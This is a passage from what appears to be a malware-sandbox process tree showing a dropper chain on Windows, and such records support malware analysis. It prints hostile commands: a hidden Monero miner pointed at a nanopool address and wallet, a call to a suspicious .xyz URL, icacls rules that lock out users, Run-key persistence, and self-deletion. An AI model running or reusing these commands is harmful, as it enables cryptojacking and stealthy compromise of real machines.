                                                                                          PID:2876
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-D0KJG.tmp\lylal220.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-D0KJG.tmp\lylal220.tmp" /SL5="$1045C,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                            12⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:4192
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-IF6T3.tmp\ysAGEL.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-IF6T3.tmp\ysAGEL.exe" /S /UID=lylal220
                                                                                              13⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4828
                                                                                              • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                dw20.exe -x -s 1284
                                                                                                14⤵
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:4020
                                                                                        • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe
                                                                                          "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe"
                                                                                          11⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:688
                                                                                          • C:\Windows\SysWOW64\dllhost.exe
                                                                                            "C:\Windows\System32\dllhost.exe"
                                                                                            12⤵
                                                                                              PID:6280
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Congiunte.vstx
                                                                                              12⤵
                                                                                                PID:6320
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\System32\cmd.exe
                                                                                                  13⤵
                                                                                                    PID:6784
                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                      findstr /V /R "^vwjMyTzhxjHATonkmcjOlJMtCRUiLDSlcOLAlCdfhnxfouvyjMTUesyNfophYkCRzbtybXwXyWALgvWvcPVYKYirIYkwzrswWDWKw$" Tue.vstx
                                                                                                      14⤵
                                                                                                        PID:7004
                                                                                                      • C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com
                                                                                                        Infinita.exe.com x
                                                                                                        14⤵
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:6448
                                                                                                        • C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com
                                                                                                          C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com x
                                                                                                          15⤵
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:4076
                                                                                                          • C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe
                                                                                                            C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe
                                                                                                            16⤵
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            • System policy modification
                                                                                                            PID:4636
                                                                                                            • C:\Users\Admin\Videos\xmrmin.exe
                                                                                                              "C:\Users\Admin\Videos\xmrmin.exe"
                                                                                                              17⤵
                                                                                                              • Adds Run key to start application
                                                                                                              PID:1096
                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                18⤵
                                                                                                                  PID:4460
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\PULServices.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\PULServices.exe"
                                                                                                                  18⤵
                                                                                                                  • Adds Run key to start application
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:2828
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                    19⤵
                                                                                                                      PID:6236
                                                                                                                • C:\Users\Admin\Videos\ethminer.exe
                                                                                                                  "C:\Users\Admin\Videos\ethminer.exe"
                                                                                                                  17⤵
                                                                                                                  • Adds Run key to start application
                                                                                                                  PID:4940
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                    18⤵
                                                                                                                      PID:2968
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\WUFServices.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"
                                                                                                                      18⤵
                                                                                                                      • Adds Run key to start application
                                                                                                                      PID:6760
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                        19⤵
                                                                                                                          PID:5320
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\WUFServices.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"
                                                                                                                            20⤵
                                                                                                                            • Adds Run key to start application
                                                                                                                            PID:5840
                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                              21⤵
                                                                                                                                PID:1228
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\WUFServices.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"
                                                                                                                                  22⤵
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  PID:4320
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                    23⤵
                                                                                                                                      PID:6320
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\WUFServices.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"
                                                                                                                                        24⤵
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        PID:2908
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                          25⤵
                                                                                                                                            PID:5140
                                                                                                                          • C:\Users\Admin\Videos\111.exe
                                                                                                                            "C:\Users\Admin\Videos\111.exe"
                                                                                                                            17⤵
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:4292
                                                                                                                            • C:\Users\Admin\Videos\111.exe
                                                                                                                              "C:\Users\Admin\Videos\111.exe"
                                                                                                                              18⤵
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:3880
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
                                                                                                                                19⤵
                                                                                                                                  PID:4248
                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                    icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
                                                                                                                                    20⤵
                                                                                                                                    • Modifies file permissions
                                                                                                                                    PID:2116
                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                    icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
                                                                                                                                    20⤵
                                                                                                                                    • Modifies file permissions
                                                                                                                                    PID:6372
                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                    icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
                                                                                                                                    20⤵
                                                                                                                                    • Modifies file permissions
                                                                                                                                    PID:6320
                                                                                                                            • C:\Users\Admin\Videos\Vickybuild.exe
                                                                                                                              "C:\Users\Admin\Videos\Vickybuild.exe"
                                                                                                                              17⤵
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:7164
                                                                                                                              • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                "C:\Windows\System32\makecab.exe"
                                                                                                                                18⤵
                                                                                                                                  PID:5984
                                                                                                                                • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                  "C:\Windows\System32\makecab.exe"
                                                                                                                                  18⤵
                                                                                                                                    PID:6972
                                                                                                                                  • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                    "C:\Windows\System32\makecab.exe"
                                                                                                                                    18⤵
                                                                                                                                      PID:2552
                                                                                                                                    • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                      "C:\Windows\System32\makecab.exe"
                                                                                                                                      18⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:5532
                                                                                                                                    • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                      "C:\Windows\System32\makecab.exe"
                                                                                                                                      18⤵
                                                                                                                                        PID:6944
                                                                                                                                      • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                        "C:\Windows\System32\makecab.exe"
                                                                                                                                        18⤵
                                                                                                                                          PID:5004
                                                                                                                                        • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                          "C:\Windows\System32\makecab.exe"
                                                                                                                                          18⤵
                                                                                                                                            PID:5296
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Distrutta.mp3
                                                                                                                                            18⤵
                                                                                                                                              PID:6824
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                19⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Adds Run key to start application
                                                                                                                                                PID:5572
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\System32\cmd.exe
                                                                                                                                                19⤵
                                                                                                                                                  PID:4336
                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                    findstr /V /R "^YNGHlhExSzslEWJWrMZhPQjfSqWRNvlCXrLShhuEbPCprUEacSOmXABiAdOldMGcpOjBlQJPFcQqgejXcEvVIKFbBDsWmWhKouZfIri$" Saluta.mp3
                                                                                                                                                    20⤵
                                                                                                                                                      PID:4364
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\sPiAfuTGyyVOZKeaLf\Uscio.exe.com
                                                                                                                                                      Uscio.exe.com Q
                                                                                                                                                      20⤵
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:6576
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\sPiAfuTGyyVOZKeaLf\Uscio.exe.com
                                                                                                                                                        C:\Users\Admin\AppData\Roaming\sPiAfuTGyyVOZKeaLf\Uscio.exe.com Q
                                                                                                                                                        21⤵
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:4756
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\sPiAfuTGyyVOZKeaLf\RegAsm.exe
                                                                                                                                                          C:\Users\Admin\AppData\Roaming\sPiAfuTGyyVOZKeaLf\RegAsm.exe
                                                                                                                                                          22⤵
                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                          PID:5408
                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                      ping 127.0.0.1 -n 30
                                                                                                                                                      20⤵
                                                                                                                                                      • Runs ping.exe
                                                                                                                                                      PID:5456
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 4636 C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe"
                                                                                                                                                17⤵
                                                                                                                                                  PID:4372
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    taskkill /F /PID 4636
                                                                                                                                                    18⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:6712
                                                                                                                                                  • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                    choice /C Y /N /D Y /T 3
                                                                                                                                                    18⤵
                                                                                                                                                      PID:6696
                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                              ping 127.0.0.1 -n 30
                                                                                                                                              14⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Adds Run key to start application
                                                                                                                                              • Runs ping.exe
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:4412
                                                                                                                                      • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe
                                                                                                                                        "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe"
                                                                                                                                        11⤵
                                                                                                                                          PID:4728
                                                                                                                                          • C:\ProgramData\6097471.exe
                                                                                                                                            "C:\ProgramData\6097471.exe"
                                                                                                                                            12⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Adds Run key to start application
                                                                                                                                            PID:5832
                                                                                                                                            • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                              "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                              13⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:6664
                                                                                                                                          • C:\ProgramData\2399232.exe
                                                                                                                                            "C:\ProgramData\2399232.exe"
                                                                                                                                            12⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5732
                                                                                                                                        • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\8mQGnEqONcmJ.exe
                                                                                                                                          "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\8mQGnEqONcmJ.exe"
                                                                                                                                          11⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          PID:4460
                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                            12⤵
                                                                                                                                              PID:6988
                                                                                                                                          • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\vlcplayer.exe
                                                                                                                                            "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\vlcplayer.exe"
                                                                                                                                            11⤵
                                                                                                                                              PID:4412
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Services.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Services.exe"
                                                                                                                                                12⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                PID:6876
                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                  C:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=7 --unam-idle-cpu=70 --tls --unam-stealth
                                                                                                                                                  13⤵
                                                                                                                                                    PID:7044
                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      14⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:4492
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\du0hwoymebo\app.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\du0hwoymebo\app.exe" /8-23
                                                                                                                                          8⤵
                                                                                                                                            PID:5244
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\du0hwoymebo\app.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\du0hwoymebo\app.exe" /8-23
                                                                                                                                              9⤵
                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                              PID:6280
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\hn2tf5r3ova\vpn.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\hn2tf5r3ova\vpn.exe" /silent /subid=482
                                                                                                                                            8⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:5308
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-G88IH.tmp\vpn.tmp
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-G88IH.tmp\vpn.tmp" /SL5="$20378,15170975,270336,C:\Users\Admin\AppData\Local\Temp\hn2tf5r3ova\vpn.exe" /silent /subid=482
                                                                                                                                              9⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                              • Modifies system certificate store
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:5520
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                10⤵
                                                                                                                                                  PID:5108
                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                    tapinstall.exe remove tap0901
                                                                                                                                                    11⤵
                                                                                                                                                      PID:4300
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                    10⤵
                                                                                                                                                      PID:6928
                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                        tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                        11⤵
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:7056
                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                      10⤵
                                                                                                                                                        PID:2828
                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                        10⤵
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:5744
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\fe3v2e0cjdm\IBInstaller_97039.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\fe3v2e0cjdm\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                    8⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:5348
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-AGK0U.tmp\IBInstaller_97039.tmp
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-AGK0U.tmp\IBInstaller_97039.tmp" /SL5="$203A6,10084460,721408,C:\Users\Admin\AppData\Local\Temp\fe3v2e0cjdm\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                      9⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:5584
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                                                                                                                        10⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        PID:5860
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-8VVDD.tmp\{app}\vdi_compiler.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-8VVDD.tmp\{app}\vdi_compiler"
                                                                                                                                                        10⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:5876
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-8VVDD.tmp\{app}\vdi_compiler.exe"
                                                                                                                                                          11⤵
                                                                                                                                                            PID:6796
                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                              ping localhost -n 4
                                                                                                                                                              12⤵
                                                                                                                                                              • Runs ping.exe
                                                                                                                                                              PID:5056
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\arazlilvh0h\kweqncc2aug.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\arazlilvh0h\kweqncc2aug.exe" /quiet SILENT=1 AF=756
                                                                                                                                                      8⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                      PID:5336
                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\arazlilvh0h\kweqncc2aug.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\arazlilvh0h\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617862174 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
                                                                                                                                                        9⤵
                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                        PID:4992
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\01fn3lm5nyt\2ohljfoxxrs.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\01fn3lm5nyt\2ohljfoxxrs.exe"
                                                                                                                                                      8⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5232
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\01fn3lm5nyt\2ohljfoxxrs.exe"
                                                                                                                                                        9⤵
                                                                                                                                                          PID:5688
                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                            ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                            10⤵
                                                                                                                                                            • Runs ping.exe
                                                                                                                                                            PID:6044
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\UCMRLBABDB\setups.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\UCMRLBABDB\setups.exe" ll
                                                                                                                                                  5⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:1928
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-IJ2N5.tmp\setups.tmp
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-IJ2N5.tmp\setups.tmp" /SL5="$5014A,2051888,270336,C:\Users\Admin\AppData\Local\Temp\UCMRLBABDB\setups.exe" ll
                                                                                                                                                    6⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:1340
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe"
                                                                                                                                                4⤵
                                                                                                                                                  PID:3516
                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"
                                                                                                                                                    5⤵
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:2552
                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                                                                      6⤵
                                                                                                                                                        PID:2876
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:2184
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                      5⤵
                                                                                                                                                        PID:4804
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill /f /im chrome.exe
                                                                                                                                                          6⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:4100
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4980
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe" >> NUL
                                                                                                                                                        5⤵
                                                                                                                                                          PID:4892
                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                            ping 127.0.0.1
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            • Runs ping.exe
                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                            PID:3516
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                        PID:4288
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:6460
                                                                                                                                                        • C:\ProgramData\3763666.exe
                                                                                                                                                          "C:\ProgramData\3763666.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4136
                                                                                                                                                        • C:\ProgramData\4234453.exe
                                                                                                                                                          "C:\ProgramData\4234453.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                                          PID:1248
                                                                                                                                                        • C:\ProgramData\5362893.exe
                                                                                                                                                          "C:\ProgramData\5362893.exe"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:5532
                                                                                                                                                            • C:\ProgramData\5362893.exe
                                                                                                                                                              "{path}"
                                                                                                                                                              6⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:4728
                                                                                                                                                          • C:\ProgramData\8560643.exe
                                                                                                                                                            "C:\ProgramData\8560643.exe"
                                                                                                                                                            5⤵
